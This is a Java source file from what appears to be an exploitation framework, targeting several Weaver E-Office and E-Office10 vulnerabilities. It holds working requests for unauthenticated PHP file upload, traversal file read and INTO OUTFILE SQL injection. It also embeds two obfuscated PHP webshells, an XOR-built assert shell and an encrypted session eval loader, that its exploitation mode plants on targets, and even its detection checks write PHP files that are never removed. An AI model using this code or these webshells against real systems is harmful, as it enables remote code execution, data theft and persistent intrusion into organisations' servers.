package com.achuna33.Controllers;

import com.achuna33.SupportType.Poc_Exp;
import com.achuna33.SupportType.SupportVul;
import com.achuna33.Utils.Cache;
import com.achuna33.Utils.HttpRequest;
import com.achuna33.Utils.Response;
import com.achuna33.Utils.Utils;

import java.net.MalformedURLException;
import java.nio.charset.StandardCharsets;

// NOTE(review): Des is not referenced anywhere in this file; sun.* internals are also not exported
// on JDK 9+ without --add-exports, so this import can presumably be dropped — confirm build JDK.
import sun.security.krb5.internal.crypto.Des;

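/**
 * Checks (POC) and exploitation steps (EXP) for several Weaver (泛微) OA E-Office / E-Office10 issues.
 *
 * Operational caveats worth knowing before pointing this at a host:
 * <ul>
 *   <li>Every UploadFile / OfficeServer / group_xml check is active: even in POC mode it writes a
 *       PHP file onto the target and never removes it. Only the officeserver LOADFILE,
 *       UserSelect, mysql_config.ini and version.json checks are read-only GETs.</li>
 *   <li>EXP mode falls back to a built-in webshell when no custom payload file is given (or the
 *       file cannot be read); the built-in shells are keyed only by a fixed parameter name, so
 *       anyone who finds the file can use it.</li>
 *   <li>Result classification is heuristic (HTTP status plus a substring); the comments on each
 *       check say how strong that evidence actually is.</li>
 * </ul>
 */
@BasicMapping(uri ="泛微OA E-Office")
public class WeaverEOfficeController  extends Controller implements BasicController{

    // ---- shared request fragments ---------------------------------------------------------

    /** Multipart boundary of the UploadFile.php request; the body template is built from it too. */
    private static final String UPLOADFILE_BOUNDARY = "e64bdf16c554bbc109cecef6451c26a4";
    /** Multipart boundary of the E-Office10 OfficeServer.php request. */
    private static final String OFFICESERVER_BOUNDARY = "----WebKitFormBoundaryJjb5ZAJOOXO7fwjs";
    /** Browser-like headers sent with the OfficeServer.php upload. */
    private static final String BROWSER_USER_AGENT =
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36";
    private static final String BROWSER_ACCEPT =
            "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9";
    /** Kept byte-for-byte (leading space included) so the request matches the original probe. */
    private static final String BROWSER_ACCEPT_ENCODING = " gzip, deflate";
    /** Fixed path the UploadFile.php probe is read back from (where uploadType=eoffice_logo lands). */
    private static final String EOFFICE_LOGO_SHELL = "/images/logo/logo-eoffice.php";
    /** Directory the OfficeServer.php SAVEFILE probe is read back from. */
    private static final String OFFICESERVER_DOCUMENT_DIR = "/eoffice10/server/public/iWebOffice2015/Document/";

    // ---- built-in webshells (used by EXP when no payload file is supplied) -----------------

    /**
     * Default shell for UploadFile.php. The six XOR pairs resolve to the string "assert"
     * (0xc3^0xa2='a', 0xc4^0xb7='s', 0x65^0x16='s', 0xb0^0xd5='e', 0x5a^0x28='r', 0x07^0x73='t'),
     * so the destructor runs assert() on POST parameter "weaver" (base64-decoded when ?id= is
     * present). On PHP 5/7 assert() evaluates a string argument as code; there is no secret beyond
     * the parameter name.
     */
    private static final String DEFAULT_ASSERT_SHELL = "<?php \n" +
            "class YXBX { \n" +
            "    function oSpp() {\n" +
            "        $aXNZ = \"\\xc3\" ^ \"\\xa2\";\n" +
            "        $yjrX = \"\\xc4\" ^ \"\\xb7\";\n" +
            "        $rIEv = \"\\x65\" ^ \"\\x16\";\n" +
            "        $LBCL = \"\\xb0\" ^ \"\\xd5\";\n" +
            "        $PUlT = \"\\x5a\" ^ \"\\x28\";\n" +
            "        $abCJ = \"\\x7\" ^ \"\\x73\";\n" +
            "        $YQCe =$aXNZ.$yjrX.$rIEv.$LBCL.$PUlT.$abCJ;\n" +
            "        return $YQCe;\n" +
            "    }\n" +
            "    function __destruct(){\n" +
            "        $jfLL=$this->oSpp();\n" +
            "        @$jfLL($this->dm);\n" +
            "    }\n" +
            "}\n" +
            "$yxbx = new YXBX();\n" +
            "@$yxbx->dm = isset($_GET['id'])?base64_decode($_POST['weaver']):$_POST['weaver'];\n" +
            "?>\n";

    /**
     * Default shell for OfficeServer.php: a session-based loader that XORs the raw request body
     * with a fixed 16-byte key, stores the first "getBasicsInfo" payload in the PHP session and
     * eval()s it on later requests. The key is hard-coded, so the log line below telling the
     * operator the "password" is weaver is only meaningful for the client that derives this key.
     */
    private static final String DEFAULT_SESSION_SHELL = "<?php\n" +
            "@session_start();\n" +
            "@set_time_limit(0);\n" +
            "@error_reporting(0);\n" +
            "function encode($D,$K){\n" +
            "    for($i=0;$i<strlen($D);$i++) {\n" +
            "        $c = $K[$i+1&15];\n" +
            "        $D[$i] = $D[$i]^$c;\n" +
            "    }\n" +
            "    return $D;\n" +
            "}\n" +
            "$payloadName='payload';\n" +
            "$key='3c6e0b8a9c15224a';\n" +
            "$data=file_get_contents(\"php://input\");\n" +
            "if ($data!==false){\n" +
            "    $data=encode($data,$key);\n" +
            "    if (isset($_SESSION[$payloadName])){\n" +
            "        $payload=encode($_SESSION[$payloadName],$key);\n" +
            "        if (strpos($payload,\"getBasicsInfo\")===false){\n" +
            "            $payload=encode($payload,$key);\n" +
            "        }\n" +
            "\t\teval($payload);\n" +
            "        echo encode(@run($data),$key);\n" +
            "    }else{\n" +
            "        if (strpos($data,\"getBasicsInfo\")!==false){\n" +
            "            $_SESSION[$payloadName]=encode($data,$key);\n" +
            "        }\n" +
            "    }\n" +
            "}\n";

    // ---- helpers ----------------------------------------------------------------------------

    /**
     * Reads the operator-supplied webshell named by {@code args[0]} (a file path).
     *
     * @return the file contents, or {@code null} when no path was given or the file could not be
     *         read. A read failure is logged rather than thrown because callers deliberately fall
     *         back to the built-in shell — be aware that this means a typo in the path still
     *         uploads the default shell.
     */
    private String loadCustomPayload(Object[] args) {
        if (args == null || args.length == 0 || !(args[0] instanceof String)) {
            return null;
        }
        String path = (String) args[0];
        try {
            byte[] bytes = Utils.readFile(path);
            // Explicit charset: the JVM default varies per platform. How HttpRequest.Post
            // re-encodes the String is not visible here, so non-ASCII payloads should be verified.
            return new String(bytes, StandardCharsets.UTF_8);
        } catch (Exception e) {
            WriteExpLog("\n [*] 文件读取失败");
            return null;
        }
    }

    /** Builds the UploadFile.php multipart body with {@code phpPayload} as the uploaded file. */
    private static String uploadFileBody(String phpPayload) {
        return "--" + UPLOADFILE_BOUNDARY + "\r\n" +
                "Content-Disposition: form-data; name=\"Filedata\"; filename=\"test.php\"\r\n" +
                "Content-Type: image/jpeg\r\n" +
                "\r\n" +
                phpPayload + "\r\n" +
                "\r\n" +
                "--" + UPLOADFILE_BOUNDARY + "--\r\n";
    }

    /**
     * Builds the OfficeServer.php multipart body: a FileData part holding {@code phpPayload} and a
     * FormData part asking OPTION=SAVEFILE to store it as {@code fileName}. Values are inserted
     * directly instead of via String.replace on a template, so a payload that happens to contain
     * the old placeholder text ("shellcode", "config_application.php") is no longer rewritten.
     */
    private static String officeServerBody(String fileName, String phpPayload) {
        return "--" + OFFICESERVER_BOUNDARY + "\r\n" +
                "Content-Disposition: form-data; name=\"FileData\"; filename=\"1.jpg\"\r\n" +
                "Content-Type: image/jpeg\r\n" +
                "\r\n" +
                phpPayload + "\r\n" +
                "\r\n" +
                "--" + OFFICESERVER_BOUNDARY + "\r\n" +
                "Content-Disposition: form-data; name=\"FormData\"\r\n" +
                "\r\n" +
                "{'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'" + fileName + "'}\r\n" +
                "--" + OFFICESERVER_BOUNDARY + "--";
    }

    /** Request to OfficeServer.php carrying the browser-like headers the original probe used. */
    private static HttpRequest newOfficeServerRequest(String target, String url) throws MalformedURLException {
        HttpRequest request = new HttpRequest(target + url);
        request.addHeaders("Content-Type", "multipart/form-data; boundary=" + OFFICESERVER_BOUNDARY);
        request.addHeaders("User-Agent", BROWSER_USER_AGENT);
        request.addHeaders("Accept", BROWSER_ACCEPT);
        request.addHeaders("Accept-Encoding", BROWSER_ACCEPT_ENCODING);
        return request;
    }

    /**
     * Fetches the uploaded shell and logs where it landed. Only the status is checked: a 200 shows
     * the file is served, not that PHP executed it — the POC branches are the ones that verify
     * execution with a marker.
     */
    private void reportShell(String shellUrl) throws MalformedURLException {
        Response check = new HttpRequest(shellUrl).Get("");
        if (check.statusCode == 200) {
            WriteExpLog("\n[*] shell path:\n" + shellUrl);
        } else {
            WriteExpLog("\n 访问失败:\n" + shellUrl);
            WriteExpLog("\n 请验证POC 可靠性 或 EXP免杀性");
        }
    }

    /**
     * True when the fetched page shows that phpinfo() actually ran: the marker word is present and
     * the PHP opening tag is not. A target that stores the file but serves it as plain text echoes
     * "<?php phpinfo();?>" back, which a bare "contains phpinfo" test would have reported as
     * vulnerable.
     */
    private static boolean phpinfoExecuted(Response response) {
        if (response.statusCode != 200 || response.responseBody == null) {
            return false;
        }
        String body = response.responseBody.toLowerCase();
        return body.contains("phpinfo") && !body.contains("<?php");
    }

    // ---- checks -----------------------------------------------------------------------------

    /**
     * CNVD-2021-49104: unauthenticated upload through /general/index/UploadFile.php. POC uploads a
     * phpinfo() file, EXP uploads the operator's file (args[0]) or the built-in assert shell.
     * Both leave the file at {@link #EOFFICE_LOGO_SHELL} on the target.
     */
    @VulnerabilityDescriptionMapping(Description="泛微OA E-Office UploadFile.php 任意文件上传漏洞 CNVD-2021-49104" ,SupportVulType= SupportVul.UploadFile)
    public void vul_UploadFile(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        WriteLog("\n[*]开始检测：  泛微OA E-Office UploadFile.php 任意文件上传漏洞 CNVD-2021-49104");
        String url = "/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId=";
        String contentType = "multipart/form-data; boundary=" + UPLOADFILE_BOUNDARY;
        switch (type) {
            case EXP: {
                String payload = loadCustomPayload(args);
                if (payload == null) {
                    payload = DEFAULT_ASSERT_SHELL;
                    WriteExpLog("\n [*] 默认shell 密码为: weaver");
                }
                HttpRequest upload = new HttpRequest(target + url);
                upload.addHeaders("Content-Type", contentType);
                upload.Post(uploadFileBody(payload));
                reportShell(target + EOFFICE_LOGO_SHELL);
                break;
            }
            case POC: {
                HttpRequest upload = new HttpRequest(target + url);
                upload.addHeaders("Content-Type", contentType);
                // Execution marker; note this is real code execution on the target, not a passive probe.
                upload.Post(uploadFileBody("<?php phpinfo();?>"));
                Response result = new HttpRequest(target + EOFFICE_LOGO_SHELL).Get("");
                if (phpinfoExecuted(result)) {
                    WriteLog("\n 存在漏洞");
                    WriteLog("\n 访问地址："+target+url );
                } else {
                    WriteLog("\n 不存在漏洞");
                }
                break;
            }
            default:
                break;
        }
    }

    /**
     * Arbitrary file read through iweboffice/officeserver.php OPTION=LOADFILE with a traversal
     * FILENAME. POC only; EXP has no separate step because the POC already returns the file.
     */
    @VulnerabilityDescriptionMapping(Description = "泛微OA E-Office officeserver.php 任意文件读取漏洞" ,SupportVulType = SupportVul.信息泄露)
    public void vul_officeserver信息泄露(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        WriteLog("\n[*]开始检测：  泛微OA E-Office officeserver.php 任意文件读取漏洞");

        String url = "/iweboffice/officeserver.php?OPTION=LOADFILE&FILENAME=../mysql_config.ini";
        switch (type) {
            case EXP:
                // Nothing to do: the POC request already discloses the file contents.
                break;
            case POC: {
                Response result = new HttpRequest(target + url).Get("");
                // "password" is the marker for an INI file coming back. A login page or error body
                // that happens to mention the word would match too, so confirm by opening the URL.
                if (result.statusCode == 200 && result.responseBody.contains("password")) {
                    WriteLog("\n 存在漏洞");
                    WriteLog("\n 访问地址："+target+url );
                } else {
                    WriteLog("\n 不存在漏洞");
                }
                break;
            }
            default:
                break;
        }
    }

    /**
     * Unauthenticated access to /UserSelect/. Evidence is an HTTP 200 alone, which is weak: a
     * catch-all front page, a redirect-to-login rendered with 200, or an SPA shell all pass.
     * Treat a hit as "needs manual confirmation" rather than as proof.
     */
    @VulnerabilityDescriptionMapping(Description = "泛微OA E-Office UserSelect 未授权访问漏洞",SupportVulType = SupportVul.信息泄露)
    public void vul_UserSelect信息泄露(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        WriteLog("\n[*]开始检测：  泛微OA E-Office UserSelect 未授权访问漏洞");

        String url = "/UserSelect/";
        switch (type) {
            case EXP:
                break;
            case POC: {
                Response result = new HttpRequest(target + url).Get("");
                if (result.statusCode == 200) {
                    WriteLog("\n 存在漏洞");
                    WriteLog("\n 访问地址："+target+url );
                } else {
                    WriteLog("\n 不存在漏洞");
                }
                break;
            }
            default:
                break;
        }
    }

    /** mysql_config.ini exposed under the web root; same "password" substring heuristic as above. */
    @VulnerabilityDescriptionMapping(Description = "泛微OA E-Office mysql_config.ini 数据库信息泄漏漏洞",SupportVulType = SupportVul.信息泄露)
    public void vul_mysql_config(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        WriteLog("\n[*]开始检测：  泛微OA E-Office mysql_config.ini 数据库信息泄漏漏洞");

        String url = "/mysql_config.ini";
        switch (type) {
            case EXP:
                break;
            case POC: {
                Response result = new HttpRequest(target + url).Get("");
                if (result.statusCode == 200 && result.responseBody.contains("password")) {
                    WriteLog("\n 存在漏洞");
                    WriteLog("\n 访问地址："+target+url );
                } else {
                    WriteLog("\n 不存在漏洞");
                }
                break;
            }
            default:
                break;
        }
    }

    /**
     * SQL injection in inc/group_user_list/group_xml.php. The base64 {@code par} value decodes to
     * {@code [group]:[1]|[groupid]:[1 union select '<?php phpinfo()?>',2,3,4,5,6,7,8 into outfile
     * '../webroot/vulntest.php']} — i.e. this "POC" is a file write via INTO OUTFILE, not a
     * read-only probe. It needs MySQL FILE privilege and a permissive secure_file_priv, it leaves
     * vulntest.php in the web root, and a file left by an earlier run will make later runs report
     * the host as vulnerable regardless of the injection.
     */
    @VulnerabilityDescriptionMapping(Description = "泛微OA E-Office group_xml.php SQL注入漏洞",SupportVulType = SupportVul.信息泄露)
    public void vul_group_xml(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        WriteLog("\n[*]开始检测：  泛微OA E-Office group_xml.php SQL注入漏洞");

        String url = "/inc/group_user_list/group_xml.php?par=W2dyb3VwXTpbMV18W2dyb3VwaWRdOlsxIHVuaW9uIHNlbGVjdCAnPD9waHAgcGhwaW5mbygpPz4nLDIsMyw0LDUsNiw3LDggaW50byBvdXRmaWxlICcuLi93ZWJyb290L3Z1bG50ZXN0LnBocCdd";
        String writtenFile = target + "/vulntest.php";
        switch (type) {
            case EXP:
                break;
            case POC: {
                // The injected query's response is irrelevant; the written file is the oracle.
                new HttpRequest(target + url).Get("");
                Response written = new HttpRequest(writtenFile).Get("");
                if (phpinfoExecuted(written)) {
                    WriteLog("\n[*] 存在漏洞");
                    WriteLog("\n[*] 访问地址："+target+url );
                    WriteLog("\n[*] 写入地址：" + writtenFile);
                } else {
                    WriteLog("\n[*] 不存在漏洞");
                }
                break;
            }
            default:
                break;
        }
    }

    /**
     * E-Office10 fingerprint via /eoffice10/version.json. This only establishes that the file is
     * readable and mentions OfficeServer.php; it does not test the upload itself (see
     * {@link #vul_UploadFile2}), so a hit here means "candidate", not "exploitable".
     */
    @VulnerabilityDescriptionMapping(Description = "泛微 eoffice10 前台 getshell（eoffice10/version.json）",SupportVulType = SupportVul.信息泄露)
    public void vul_version_json(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        WriteLog("\n[*]开始检测：  泛微 eoffice10 前台 getshell（eoffice10/version.json）");

        String url = "/eoffice10/version.json" ;
        switch (type) {
            case EXP:
                break;
            case POC: {
                Response result = new HttpRequest(target + url).Get("");
                // Bug fix: the body is lower-cased, so the needle must be lower-case too — the old
                // mixed-case "OfficeServer.php" literal could never match and the check always
                // reported "not vulnerable".
                if (result.statusCode == 200 && result.responseBody.toLowerCase().contains("officeserver.php")) {
                    WriteLog("\n[*] 存在漏洞");
                    WriteLog("\n[*] 访问地址："+target+url );
                } else {
                    WriteLog("\n[*] 不存在漏洞");
                }
                break;
            }
            default:
                break;
        }
    }

    /**
     * E-Office10 arbitrary upload through iWebOffice2015/OfficeServer.php OPTION=SAVEFILE. The
     * file is stored under {@link #OFFICESERVER_DOCUMENT_DIR} with a random 4-character .php name
     * (Utils.getRandomString — whether that is cryptographically random is not visible here, and
     * four characters can collide across runs). POC writes an md5(1) echo marker, which unlike a
     * phpinfo() marker can only appear if PHP executed the file; EXP writes the operator's file
     * or the built-in session shell. Neither mode removes the file afterwards.
     */
    @VulnerabilityDescriptionMapping(Description="泛微OA E-Office10 OfficeServer.php 任意文件上传漏洞 " ,SupportVulType= SupportVul.UploadFile)
    public void vul_UploadFile2(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        // Consistency: log through the shared helper like every other check instead of poking the
        // UI text area directly.
        WriteLog("\n[*]开始检测：  泛微OA E-Office10 OfficeServer.php 任意文件上传漏洞");
        String url = "/eoffice10/server/public/iWebOffice2015/OfficeServer.php";
        switch (type) {
            case EXP: {
                String payload = loadCustomPayload(args);
                if (payload == null) {
                    payload = DEFAULT_SESSION_SHELL;
                    WriteExpLog("\n [*] 默认shell 密码为: weaver");
                }
                String shellName = Utils.getRandomString(4) + ".php";
                HttpRequest upload = newOfficeServerRequest(target, url);
                upload.Post(officeServerBody(shellName, payload));
                reportShell(target + OFFICESERVER_DOCUMENT_DIR + shellName);
                break;
            }
            case POC: {
                String shellName = Utils.getRandomString(4) + ".php";
                HttpRequest upload = newOfficeServerRequest(target, url);
                upload.Post(officeServerBody(shellName, "<?php echo md5(1);?>"));
                Response result = new HttpRequest(target + OFFICESERVER_DOCUMENT_DIR + shellName).Get("");

                // c4ca4238a0b923820dcc509a6f75849b == md5("1"): present only if the PHP ran.
                if (result.statusCode == 200 && result.responseBody.toLowerCase().contains("c4ca4238a0b923820dcc509a6f75849b")) {
                    WriteLog("\n 存在漏洞");
                } else {
                    WriteLog(result.responseBody);
                    WriteLog("\n 不存在漏洞");
                }
                break;
            }
            default:
                break;
        }
    }

}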
